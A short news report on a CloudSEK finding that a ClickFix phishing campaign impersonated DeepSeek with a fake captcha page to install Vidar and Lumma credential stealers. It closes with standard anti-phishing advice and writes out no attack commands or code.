Bengaluru: CloudSEK’s Threat Intelligence Team has identified a dangerous ClickFix phishing campaign that exploits DeepSeek’s brand name to deceive users and install credential-stealing malware.
How the DeepSeek ClickFix Scam Works
Cybercriminals have used a deceptive domain, deepseekcaptcha[.]top, designed to impersonate a DeepSeek verification page. This fake site tricks users into clicking a fraudulent captcha verification button, which, once activated, executes a PowerShell command that installs Vidar Stealer and Lumma Stealer malware. These malicious programs extract sensitive information such as login credentials, financial data, and session tokens, with a particular focus on Steam and Telegram accounts. To evade detection by AI-powered security systems, the attackers have utilized Cloudflare hosting, allowing the malicious domain to remain undetected and active for an extended duration.
The Growing Threat
The DeepSeek ClickFix scam is part of a growing cybercrime trend where attackers exploit the rapid adoption of AI to manipulate user trust in technology. According to CloudSEK researchers, AI-driven scams are becoming increasingly sophisticated and targeted, allowing them to evade traditional security measures. By leveraging fake verification pages, social media integration, and Cloudflare masking techniques, cybercriminals make these attacks more difficult to detect and mitigate.
According to CloudSEK’s Threat Intelligence Lead, Sparsh Kulshrestha, “The DeepSeek ClickFix scam is a stark reminder of how cybercriminals continuously adapt to exploit emerging technologies. AI users must be extra vigilant when engaging with online verification requests.”
How to Stay Safe – CloudSEK’s Recommendations
In order to safeguard systems from sophisticated phishing attacks, CloudSEK recommends the following best practices:
-
Double-Check Website URLs – Always verify if a website is legitimate before entering credentials.
-
Beware of Fake Captcha Pages – AI platforms do not require repeated captchas. If prompted, proceed with caution.
-
Enable Multi-Factor Authentication (MFA) – Even if credentials are stolen, MFA can prevent unauthorized access.
-
Use Advanced Anti-Phishing Protection – Organizations should deploy email filtering solutions and domain monitoring tools to detect phishing sites early.
-
Regularly Update Software – Ensure that your device and security software are up to date to prevent vulnerabilities.
Discussion about this post